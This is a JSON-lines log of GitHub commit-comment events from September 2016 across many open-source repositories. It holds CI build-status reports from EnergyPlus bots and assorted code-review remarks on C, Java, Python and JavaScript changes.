{"id":"4599872278","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19123469,"position":null,"line":null,"path":null,"commit_id":"c68b4297923893da10611ee856944ed40ffe3373","created_at":"2016-09-22T01:04:55Z","updated_at":"2016-09-22T01:04:55Z","body":"develop (nmerket) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1767 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c68b4297923893da10611ee856944ed40ffe3373-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c68b4297923893da10611ee856944ed40ffe3373-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c68b4297923893da10611ee856944ed40ffe3373-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-22T01:04:55Z"}
{"id":"4599874338","type":"CommitCommentEvent","actor":{"login":"leif81"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19123474,"position":null,"line":null,"path":null,"commit_id":"634bf36e3e612d39c3c45e93f92c6013bbe3b6d5","created_at":"2016-09-22T01:05:38Z","updated_at":"2016-09-22T01:05:38Z","body":"Yikes, yes, this one is a good reminder to me of how wonky JavaScript can be.\r\n\r\nI re-learned two things!\r\n\r\n- Function names must be unique, or else the most recently defined one wins. \r\n\r\n- The number of params a function takes doesn't matter. You could have a function that takes two params, but call it with one and it will still call the function.\r\n\r\ne.g.\r\n\r\n    function hi(first, last) {\r\n        alert(\"hello \" + first + \" \" + last);\r\n    }\r\n\r\n    hi(\"matt\");\r\n\r\nIt will just print \"hello matt\"."}},"created_at":"2016-09-22T01:05:38Z"}
{"id":"4599875004","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19123477,"position":null,"line":null,"path":null,"commit_id":"c68b4297923893da10611ee856944ed40ffe3373","created_at":"2016-09-22T01:05:55Z","updated_at":"2016-09-22T01:05:55Z","body":"develop (nmerket) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c68b4297923893da10611ee856944ed40ffe3373-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T01:05:55Z"}
{"id":"4599878608","type":"CommitCommentEvent","actor":{"login":"kalletlak"},"repo":{"name":"cBioPortal/iViz"},"payload":{"comment":{"id":19123487,"position":7,"line":65,"path":"app/styles/components/vc/_editable-row.scss","commit_id":"0c8cbf73377a9fa772265c895feb8a670813a3ee","created_at":"2016-09-22T01:07:17Z","updated_at":"2016-09-22T01:07:17Z","body":"This problem arise because of input-group css in jquery-ui. And in this component we are not you btn-sm or btn-lg. May be work around for this would be to create a new css class with those style and add the class to those elements."}},"created_at":"2016-09-22T01:07:17Z"}
{"id":"4599888251","type":"CommitCommentEvent","actor":{"login":"minecrafter"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19123531,"position":5,"line":126,"path":"api/src/main/java/com/voxelwind/api/server/event/block/BlockReplaceEvent.java","commit_id":"fe8d1cebd2aa3a61216b81524f39d76aea5ac99d","created_at":"2016-09-22T01:10:41Z","updated_at":"2016-09-22T01:10:41Z","body":"I like what I am doing as it is clear as to what is being done.\r\n\r\nIn my opinion, `Cancellable` is an ugly abstraction."}},"created_at":"2016-09-22T01:10:41Z"}
{"id":"4599888272","type":"CommitCommentEvent","actor":{"login":"zh-h"},"repo":{"name":"b3log/symphony"},"payload":{"comment":{"id":19123532,"position":null,"line":null,"path":null,"commit_id":"edcb4c4697ab941c1e04c67342c75e3bbe5a524b","created_at":"2016-09-22T01:10:41Z","updated_at":"2016-09-22T01:10:41Z","body":"@ZephyrJung 注意格式"}},"created_at":"2016-09-22T01:10:41Z"}
{"id":"4599890752","type":"CommitCommentEvent","actor":{"login":"silas"},"repo":{"name":"silas/node-consul"},"payload":{"comment":{"id":19123546,"position":null,"line":null,"path":null,"commit_id":"618a00c8929034af745a9f464627d439582a73c4","created_at":"2016-09-22T01:11:38Z","updated_at":"2016-09-22T01:11:38Z","body":"You don't need to pass any session options, it was just a thing someone requested.\r\n\r\nTo request a lock call `var lock = consul.lock({ key: 'test' });` Where `test` is a kv path. The lock is acquired when the `acquire` signal is emitted. The lock is no longer valid when `end` is emitted. These are the only signals you should use for tracking the state of the lock. The `error` signal is just for logging. The `release` signal is only emitted when the lock was gracefully released (`end` will also be emitted when gracefully released).\r\n\r\nSee https://github.com/silas/node-consul#consullockoptions for more information."}},"created_at":"2016-09-22T01:11:38Z"}
{"id":"4599893521","type":"CommitCommentEvent","actor":{"login":"chriskuehl"},"repo":{"name":"ocf/utils"},"payload":{"comment":{"id":19123553,"position":null,"line":null,"path":null,"commit_id":"b8c5ca8f39f2f058348ca56e858d914e798168f7","created_at":"2016-09-22T01:12:44Z","updated_at":"2016-09-22T01:12:44Z","body":"nice"}},"created_at":"2016-09-22T01:12:44Z"}
{"id":"4599900475","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19123574,"position":null,"line":null,"path":null,"commit_id":"be49ee5145169a92fd9fc06827a1e6ba7ca0385b","created_at":"2016-09-22T01:15:29Z","updated_at":"2016-09-22T01:15:29Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-MacOS-10.9-clang: OK (2335 of 2335 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be49ee5145169a92fd9fc06827a1e6ba7ca0385b-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be49ee5145169a92fd9fc06827a1e6ba7ca0385b-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T01:15:29Z"}
{"id":"4599900885","type":"CommitCommentEvent","actor":{"login":"ZephyrJung"},"repo":{"name":"b3log/symphony"},"payload":{"comment":{"id":19123576,"position":null,"line":null,"path":null,"commit_id":"edcb4c4697ab941c1e04c67342c75e3bbe5a524b","created_at":"2016-09-22T01:15:39Z","updated_at":"2016-09-22T01:15:39Z","body":"老忘orz"}},"created_at":"2016-09-22T01:15:39Z"}
{"id":"4599901995","type":"CommitCommentEvent","actor":{"login":"Valks"},"repo":{"name":"SolidRun/u-boot-armada38x"},"payload":{"comment":{"id":19123584,"position":null,"line":null,"path":null,"commit_id":"b776b543e0ac701a317a2c3b6f5c57eb4fc3827a","created_at":"2016-09-22T01:16:03Z","updated_at":"2016-09-22T01:16:03Z","body":"More important comment is added <unistd.h> for sleep function\r\nAlso added sleep after send-stop-pattern to give the clearfog a chance to be ready to receive."}},"created_at":"2016-09-22T01:16:03Z"}
{"id":"4599904680","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19123591,"position":null,"line":null,"path":null,"commit_id":"eff536c5239fdd16a6b96bdcdc7b6456a58c349d","created_at":"2016-09-22T01:17:05Z","updated_at":"2016-09-22T01:17:05Z","body":"128792325-Issue5803 (wfbuhl) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1184 of 1184 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.95%25-green.svg)</a>\n"}},"created_at":"2016-09-22T01:17:05Z"}
{"id":"4599906139","type":"CommitCommentEvent","actor":{"login":"danieldsdias"},"repo":{"name":"stone-pagamentos/UGUI"},"payload":{"comment":{"id":19123597,"position":14,"line":1705,"path":"ugui.c","commit_id":"3b2c5070c2bda75a37dec6c4bb67071d754c9552","created_at":"2016-09-22T01:17:41Z","updated_at":"2016-09-22T01:17:41Z","body":"@FPTeixeira Sugiro criar uma macro no ugui_config para Ugui_log e vc apontar para a BR_LOG lá. Fazer uso de apenas funções da ugui na ugui.c/h.\r\n\r\n**_OBS: Sei q vc botou só pra debugar e não iria deixar mas acho interessante colocar log e eles serem desprezados numa versão \"release\" ou implementados numa versão \"debug\"_**"}},"created_at":"2016-09-22T01:17:41Z"}
{"id":"4599906621","type":"CommitCommentEvent","actor":{"login":"ZephyrJung"},"repo":{"name":"b3log/symphony"},"payload":{"comment":{"id":19123598,"position":null,"line":null,"path":null,"commit_id":"edcb4c4697ab941c1e04c67342c75e3bbe5a524b","created_at":"2016-09-22T01:17:53Z","updated_at":"2016-09-22T01:17:53Z","body":"@88250 打算改用requestAnimationFrame，不知到alert有没有用，我试试"}},"created_at":"2016-09-22T01:17:53Z"}
{"id":"4599906700","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19123599,"position":null,"line":null,"path":null,"commit_id":"9b27d6b83fbfbdb40a1776a1d3910648609482c4","created_at":"2016-09-22T01:17:55Z","updated_at":"2016-09-22T01:17:55Z","body":"Also see [Issue 298](https://github.com/weidai11/cryptopp/issues/298)."}},"created_at":"2016-09-22T01:17:55Z"}
{"id":"4599908172","type":"CommitCommentEvent","actor":{"login":"gedare"},"repo":{"name":"AoLaD/rtems"},"payload":{"comment":{"id":19123602,"position":8,"line":8,"path":"c/src/lib/libbsp/arm/tms570/hwinit/tms570_hwinit.h","commit_id":"b204502d4ccdef6a21fef36840b6a893bd6cca0a","created_at":"2016-09-22T01:18:30Z","updated_at":"2016-09-22T01:18:30Z","body":"why volatile?  why not (const void*) or maybe better uintptr_t?"}},"created_at":"2016-09-22T01:18:30Z"}
{"id":"4599912189","type":"CommitCommentEvent","actor":{"login":"gedare"},"repo":{"name":"AoLaD/rtems"},"payload":{"comment":{"id":19123615,"position":13,"line":51,"path":"c/src/lib/libbsp/arm/tms570/hwinit/init_emif_sdram.c","commit_id":"aed1d28276896f75e68cd38b83ef5b44e61ad81d","created_at":"2016-09-22T01:19:57Z","updated_at":"2016-09-22T01:19:57Z","body":"I think it usually worthwhile to comment why barrier/fence are necessary."}},"created_at":"2016-09-22T01:19:57Z"}
{"id":"4599917949","type":"CommitCommentEvent","actor":{"login":"miged"},"repo":{"name":"miged/asp-test"},"payload":{"comment":{"id":19123629,"position":3,"line":41,"path":"todo.md","commit_id":"3776c729d8385e3a1ed425102cbfc96ffe5219db","created_at":"2016-09-22T01:22:10Z","updated_at":"2016-09-22T01:22:10Z","body":"wagg"}},"created_at":"2016-09-22T01:22:10Z"}
{"id":"4599921898","type":"CommitCommentEvent","actor":{"login":"gedare"},"repo":{"name":"AoLaD/rtems"},"payload":{"comment":{"id":19123639,"position":null,"line":null,"path":null,"commit_id":"c4cbfe855bf5d5ab2d7bdb389e34005245f5c1ad","created_at":"2016-09-22T01:23:47Z","updated_at":"2016-09-22T01:23:47Z","body":"This is a great improvement in the self-documentation, thanks!"}},"created_at":"2016-09-22T01:23:47Z"}
{"id":"4599923006","type":"CommitCommentEvent","actor":{"login":"gedare"},"repo":{"name":"AoLaD/rtems"},"payload":{"comment":{"id":19123641,"position":19,"line":117,"path":"c/src/lib/libbsp/arm/tms570/README","commit_id":"45fda72de9bb7b2fd058d4f2bca5f243541f5393","created_at":"2016-09-22T01:24:15Z","updated_at":"2016-09-22T01:24:15Z","body":"typo: self-test"}},"created_at":"2016-09-22T01:24:15Z"}
{"id":"4599924578","type":"CommitCommentEvent","actor":{"login":"scottbernstein"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19123646,"position":null,"line":null,"path":null,"commit_id":"b420f6c6ad093f6eded617c9bfb989f6316b1bd7","created_at":"2016-09-22T01:24:46Z","updated_at":"2016-09-22T01:24:46Z","body":"All of these changes are already working in Livestreamer for plugins which are broken currently (and people keep opening bug reports for) but haven't been merged in by the project maintainer. I did fix the package names in the first file I checked in after I realized what I'd done. Figured it would just be faster to check them into master to  get them in for the 1.0 release.\n\nOn Sep 21, 2016, at 7:14 PM, Forrest <notifications@github.com<mailto:notifications@github.com>> wrote:\n\n\nThanks for reverting @cdrage<https://github.com/cdrage>. @scottbernstein<https://github.com/scottbernstein> Please fork the repo then branch in your repo, then open a PR against the main streamlink repo. That let's us review it, confirm tests look good, and then get it merged in.\n\n-\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub<https://github.com/streamlink/streamlink/commit/b420f6c6ad093f6eded617c9bfb989f6316b1bd7#commitcomment-19122417>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AESJ1r4LhTqxGUr0SK0rmtiA_oiJslL8ks5qsbo8gaJpZM4KDU5G>.\n"}},"created_at":"2016-09-22T01:24:46Z"}
{"id":"4599932369","type":"CommitCommentEvent","actor":{"login":"phil-lopreiato"},"repo":{"name":"the-blue-alliance/the-blue-alliance"},"payload":{"comment":{"id":19123679,"position":null,"line":null,"path":null,"commit_id":"4a3b74834c2f50c12db04fbabd9da4cd7932ea4f","created_at":"2016-09-22T01:27:33Z","updated_at":"2016-09-22T01:27:33Z","body":"Yeah, this is better than the way I did it :+1: "}},"created_at":"2016-09-22T01:27:33Z"}
{"id":"4599939245","type":"CommitCommentEvent","actor":{"login":"sbstp"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19123695,"position":null,"line":null,"path":null,"commit_id":"b420f6c6ad093f6eded617c9bfb989f6316b1bd7","created_at":"2016-09-22T01:30:23Z","updated_at":"2016-09-22T01:30:23Z","body":"I'm looking at the [master branch](https://github.com/streamlink/streamlink/blob/8f40b997b2b5e91dbc8deef526d491491a99de90/src/streamlink/plugins/livestream.py#L3-L7) right now and the code I see is broken. I'm not trying to blame you or anything, I know that your intentions were good, but if we were to publish the package right now, the livestream.com package wouldn't work. That's why we use pull requests and peer reviews."}},"created_at":"2016-09-22T01:30:23Z"}
{"id":"4599939761","type":"CommitCommentEvent","actor":{"login":"yakiradixon"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19123698,"position":20,"line":239,"path":"otrv4.md","commit_id":"d188bf58842e839a856f9427f32c6fbbd7748648","created_at":"2016-09-22T01:30:34Z","updated_at":"2016-09-22T01:30:34Z","body":"Yeah, true. This is something you pointed out when we were whiteboarding this earlier."}},"created_at":"2016-09-22T01:30:34Z"}
{"id":"4599943225","type":"CommitCommentEvent","actor":{"login":"hydra"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19123702,"position":null,"line":null,"path":null,"commit_id":"8764fb9e814af6ff02858cb0c970767bdbd4af2e","created_at":"2016-09-22T01:31:47Z","updated_at":"2016-09-22T01:31:47Z","body":"oh dear :smile: that's rather annoying. suggestions?"}},"created_at":"2016-09-22T01:31:47Z"}
{"id":"4599945550","type":"CommitCommentEvent","actor":{"login":"fengyuanchen"},"repo":{"name":"maruilian11/cdnjs"},"payload":{"comment":{"id":19123707,"position":null,"line":null,"path":null,"commit_id":"4f711fe3d238967263a088a79ce282e247083259","created_at":"2016-09-22T01:32:38Z","updated_at":"2016-09-22T01:32:38Z","body":"I have to point out that the [Photo Editor](https://github.com/fengyuanchen/photo-editor) is an web app, not a library."}},"created_at":"2016-09-22T01:32:38Z"}
{"id":"4599945741","type":"CommitCommentEvent","actor":{"login":"KohliDev"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19123709,"position":62,"line":83,"path":"packages/examples/graphite_system_stats.py","commit_id":"6b38359ba67e59c236ee4d71dce3984e00b9dc9b","created_at":"2016-09-22T01:32:42Z","updated_at":"2016-09-22T01:32:42Z","body":"Change has to be made it should be common register() call not seperate register_metric()"}},"created_at":"2016-09-22T01:32:42Z"}
{"id":"4599953373","type":"CommitCommentEvent","actor":{"login":"olivierchatry"},"repo":{"name":"knownasilya/ember-cli-deploy-gcloud-storage"},"payload":{"comment":{"id":19123724,"position":null,"line":null,"path":null,"commit_id":"e69439bcf1228904e9429e6b91d34597240b0c09","created_at":"2016-09-22T01:35:47Z","updated_at":"2016-09-22T01:35:47Z","body":"Sure, I will try next week, good job !"}},"created_at":"2016-09-22T01:35:47Z"}
{"id":"4599953500","type":"CommitCommentEvent","actor":{"login":"KohliDev"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19123725,"position":67,"line":87,"path":"packages/examples/graphite_system_stats.py","commit_id":"6b38359ba67e59c236ee4d71dce3984e00b9dc9b","created_at":"2016-09-22T01:35:50Z","updated_at":"2016-09-22T01:35:50Z","body":"Metric name array can be passed from sampleProp.conf in spite of hard coding the metric name."}},"created_at":"2016-09-22T01:35:50Z"}
{"id":"4599955778","type":"CommitCommentEvent","actor":{"login":"KohliDev"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19123730,"position":5,"line":58,"path":"packages/liotapkg.sh","commit_id":"6b38359ba67e59c236ee4d71dce3984e00b9dc9b","created_at":"2016-09-22T01:36:45Z","updated_at":"2016-09-22T01:36:45Z","body":"Wrong Path added /etc/liota/packages/package_messenger.fifo\r\n\r\nIs the code tested once before merging?"}},"created_at":"2016-09-22T01:36:45Z"}
{"id":"4599957416","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19123732,"position":null,"line":null,"path":null,"commit_id":"a9e11b68b4dee10cb9e1a519c78a89d919c3b9db","created_at":"2016-09-22T01:37:26Z","updated_at":"2016-09-22T01:37:26Z","body":"    `type/t_Hakaru` := { 'known_continuous', 'known_discrete', 'Ret(anything)',\r\n        'Bind(anything, name, anything)', 'specfunc(Msum)', 'Weight(anything, anything)',\r\n       t_pw, t_case, 'Plate(anything, name, anything)'}\r\n\r\nwould be an excellent first approximation.  I essentially just read `integrate`, and skipped some cases that we don't want to deal with as inputs (right now)."}},"created_at":"2016-09-22T01:37:26Z"}
{"id":"4599960383","type":"CommitCommentEvent","actor":{"login":"KohliDev"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19123737,"position":60,"line":81,"path":"packages/examples/graphite_system_stats.py","commit_id":"6b38359ba67e59c236ee4d71dce3984e00b9dc9b","created_at":"2016-09-22T01:38:47Z","updated_at":"2016-09-22T01:38:47Z","body":"Change has to be made it should be common register() call not separate register_metric()\r\n"}},"created_at":"2016-09-22T01:38:47Z"}
{"id":"4599962262","type":"CommitCommentEvent","actor":{"login":"KohliDev"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19123744,"position":63,"line":84,"path":"packages/examples/graphite_system_stats.py","commit_id":"6b38359ba67e59c236ee4d71dce3984e00b9dc9b","created_at":"2016-09-22T01:39:34Z","updated_at":"2016-09-22T01:39:34Z","body":"Change has to be made it should be common register() call not separate register_metric()\r\n"}},"created_at":"2016-09-22T01:39:34Z"}
{"id":"4599973142","type":"CommitCommentEvent","actor":{"login":"aikar"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":19123768,"position":null,"line":null,"path":null,"commit_id":"56857ae801ae8a149cb6281d8d36bfa313502abb","created_at":"2016-09-22T01:44:09Z","updated_at":"2016-09-22T01:44:09Z","body":"That thing you're mentioning is something completely different.\r\n\r\nThat line relates to a spigot change that stops blocking the main thread."}},"created_at":"2016-09-22T01:44:09Z"}
{"id":"4599974192","type":"CommitCommentEvent","actor":{"login":"jenly1314"},"repo":{"name":"jenly1314/Base"},"payload":{"comment":{"id":19123772,"position":null,"line":null,"path":null,"commit_id":"51964ba8f069ac09ac3be4bcb68379e6a5642d75","created_at":"2016-09-22T01:44:34Z","updated_at":"2016-09-22T01:44:34Z","body":"commit"}},"created_at":"2016-09-22T01:44:34Z"}
{"id":"4599975385","type":"CommitCommentEvent","actor":{"login":"KohliDev"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19123775,"position":64,"line":75,"path":"examples/dell5k_system_graphite.py","commit_id":"174588a54d741f592a01a6a53b20de05e9c730eb","created_at":"2016-09-22T01:45:04Z","updated_at":"2016-09-22T01:45:04Z","body":"Proper code formatting has to be done. Blank line to be inserted."}},"created_at":"2016-09-22T01:45:04Z"}
{"id":"4599978978","type":"CommitCommentEvent","actor":{"login":"KohliDev"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19123782,"position":64,"line":75,"path":"examples/dell5k_system_graphite.py","commit_id":"05d04d78aff9615e04caa1922579774f598821cb","created_at":"2016-09-22T01:46:33Z","updated_at":"2016-09-22T01:46:33Z","body":"Code formatting to be done."}},"created_at":"2016-09-22T01:46:33Z"}
{"id":"4599985426","type":"CommitCommentEvent","actor":{"login":"hugabor"},"repo":{"name":"Agile-Puppers/Clean-Water"},"payload":{"comment":{"id":19123794,"position":10,"line":10,"path":"src/main/java/agilepuppers/cleanwater/SceneSwitcher.java","commit_id":"8819e7ae2a03b19ba535c320f93d7eb8405d2edc","created_at":"2016-09-22T01:49:16Z","updated_at":"2016-09-22T01:49:16Z","body":"There's probably a better and more object-oriented way to do this besides making a SceneSwitcher class..."}},"created_at":"2016-09-22T01:49:16Z"}
{"id":"4599985686","type":"CommitCommentEvent","actor":{"login":"jinankjain"},"repo":{"name":"mozilla/ssh_scan"},"payload":{"comment":{"id":19123796,"position":null,"line":null,"path":null,"commit_id":"f0feab237345b6d226ceeadfea531b85a888799b","created_at":"2016-09-22T01:49:23Z","updated_at":"2016-09-22T01:49:23Z","body":"@claudijd Now blog looks fine! Fixed those broken relative URL"}},"created_at":"2016-09-22T01:49:23Z"}
{"id":"4599989549","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19123806,"position":null,"line":null,"path":null,"commit_id":"6bfa0d9ab0203ca02daa0c240603bdb87108e0b5","created_at":"2016-09-22T01:51:01Z","updated_at":"2016-09-22T01:51:01Z","body":"Also see [Issue 295](https://github.com/weidai11/cryptopp/issues/295)."}},"created_at":"2016-09-22T01:51:01Z"}
{"id":"4599991465","type":"CommitCommentEvent","actor":{"login":"Mygod"},"repo":{"name":"shadowsocks/shadowsocks-android"},"payload":{"comment":{"id":19123810,"position":4,"line":121,"path":"src/main/AndroidManifest.xml","commit_id":"0edbe012375a783589838cdaacda758b49e00300","created_at":"2016-09-22T01:51:49Z","updated_at":"2016-09-22T01:51:49Z","body":"This is incorrect because ShadowsocksRunnerService will read SharedPreferences and this will result in incorrect behavior after making changes to settings."}},"created_at":"2016-09-22T01:51:49Z"}
{"id":"4599994413","type":"CommitCommentEvent","actor":{"login":"Mwnesbitt"},"repo":{"name":"MrChrisJ/fullnode"},"payload":{"comment":{"id":19123815,"position":null,"line":null,"path":null,"commit_id":"136a4126fe0705c1d2a6f1ac07107835886c3812","created_at":"2016-09-22T01:53:05Z","updated_at":"2016-09-22T01:53:05Z","body":"Not sure if anyone is reading this, but I fresh installed Jessie from the Raspberry Pi website and I'm still experience the autogen errors that you reference in this commit.  Would love any advice on how to get this thing up and running.  Thanks."}},"created_at":"2016-09-22T01:53:05Z"}
{"id":"4599996352","type":"CommitCommentEvent","actor":{"login":"elifoster"},"repo":{"name":"squeek502/AppleCore"},"payload":{"comment":{"id":19123819,"position":null,"line":null,"path":null,"commit_id":"c7c9d75e75a830c2b00b315ea06357bba5cb99b6","created_at":"2016-09-22T01:53:55Z","updated_at":"2016-09-22T01:53:55Z","body":"This won't silence the other warning mentioned in #77 though."}},"created_at":"2016-09-22T01:53:55Z"}
{"id":"4599998103","type":"CommitCommentEvent","actor":{"login":"ifchen0"},"repo":{"name":"iitc-project/ingress-intel-total-conversion"},"payload":{"comment":{"id":19123823,"position":null,"line":null,"path":null,"commit_id":"6f10ff8614ef603a9c0aa5b3761bfa4242ac8595","created_at":"2016-09-22T01:54:40Z","updated_at":"2016-09-22T01:54:40Z","body":"It seems canvas not round on edge, maybe add them will look better?\r\n```\r\n\t_drawPath: function () {\r\n\t\tvar i, j, len, len2, point, drawMethod;\r\n\t\t\r\n        \tif (this.options.dashArray) {\r\n            \t\tvar da = typeof(this.options.dashArray) === \"string\" ? this.options.dashArray.split(\",\").map(function(el,ix,ar) { return parseInt(el); }) : this.options.dashArray;\r\n            \t\tthis._ctx.setLineDash(da);\r\n        \t} else {\r\n\t\t\tthis._ctx.setLineDash([]);\r\n        \t}\r\n        \t\r\n\t\tthis._ctx.beginPath();\r\n        //Add round for canvas - START\r\n        this._ctx.lineCap  = 'round';\r\n        this._ctx.lineJoin = 'round';\r\n        //Add round for canvas - END\r\n```"}},"created_at":"2016-09-22T01:54:40Z"}
{"id":"4600003012","type":"CommitCommentEvent","actor":{"login":"pnarayanan"},"repo":{"name":"linkedin/ambry"},"payload":{"comment":{"id":19123837,"position":30,"line":654,"path":"ambry-router/src/test/java/com.github.ambry.router/GetBlobOperationTest.java","commit_id":"42c63605de636141eea2cec8ce123b1ddc4872da","created_at":"2016-09-22T01:56:44Z","updated_at":"2016-09-22T01:56:44Z","body":"shouldn't you fail if `get()` does not throw an `ExecutionException`?"}},"created_at":"2016-09-22T01:56:44Z"}
{"id":"4600003451","type":"CommitCommentEvent","actor":{"login":"SaroyaMan"},"repo":{"name":"SaroyaMan/WeatherData-CSharp"},"payload":{"comment":{"id":19123838,"position":null,"line":null,"path":null,"commit_id":"57004cef89e61d30c9dd21baeda68f4a2d346c21","created_at":"2016-09-22T01:56:54Z","updated_at":"2016-09-22T01:56:54Z","body":"Last update: 22/09/2016"}},"created_at":"2016-09-22T01:56:54Z"}
{"id":"4600003493","type":"CommitCommentEvent","actor":{"login":"ifchen0"},"repo":{"name":"iitc-project/ingress-intel-total-conversion"},"payload":{"comment":{"id":19123839,"position":null,"line":null,"path":null,"commit_id":"250e54ab8d950b0bd47814bc88b31877af769ec0","created_at":"2016-09-22T01:56:55Z","updated_at":"2016-09-22T01:56:55Z","body":"It seems canvas not round on edge, maybe add them will look better?\r\n\r\n```\r\n    _drawPath: function () {\r\n        var i, j, len, len2, point, drawMethod;\r\n\r\n            if (this.options.dashArray) {\r\n                    var da = typeof(this.options.dashArray) === \"string\" ? this.options.dashArray.split(\",\").map(function(el,ix,ar) { return parseInt(el); }) : this.options.dashArray;\r\n                    this._ctx.setLineDash(da);\r\n            } else {\r\n            this._ctx.setLineDash([]);\r\n            }\r\n\r\n        this._ctx.beginPath();\r\n        //Add round for canvas - START\r\n        this._ctx.lineCap  = 'round';\r\n        this._ctx.lineJoin = 'round';\r\n        //Add round for canvas - END\r\n```"}},"created_at":"2016-09-22T01:56:55Z"}
{"id":"4601487449","type":"CommitCommentEvent","actor":{"login":"mikera"},"repo":{"name":"mikera/core.matrix"},"payload":{"comment":{"id":19127600,"position":null,"line":null,"path":null,"commit_id":"795caccfa70471520b441dfe972fcf6e9ac1f451","created_at":"2016-09-22T10:00:55Z","updated_at":"2016-09-22T10:00:55Z","body":"Hi @mjwillson I just wanted to let you know that I have reverted this and one other commit you made because I understand via Alex Miller that you are unable to sign the Clojure CA.\r\n\r\nLet me know if that changes, and I can reinstate. Thanks!"}},"created_at":"2016-09-22T10:00:55Z"}
{"id":"4601488505","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19127602,"position":5,"line":86,"path":"cura/QualityManager.py","commit_id":"46dd4f6093e393938a8a51679d3e4e2f466d5576","created_at":"2016-09-22T10:01:08Z","updated_at":"2016-09-22T10:01:08Z","body":"You don't need to check for length. using if material_containers: does the same."}},"created_at":"2016-09-22T10:01:08Z"}
{"id":"4601489127","type":"CommitCommentEvent","actor":{"login":"uxin603s"},"repo":{"name":"uxin603s/tag_system"},"payload":{"comment":{"id":19127604,"position":7,"line":17,"path":"TagRelation.php","commit_id":"84a1603e0d77d764d6185e6ca732b6bec4924e8a","created_at":"2016-09-22T10:01:15Z","updated_at":"2016-09-22T10:01:15Z","body":"123"}},"created_at":"2016-09-22T10:01:15Z"}
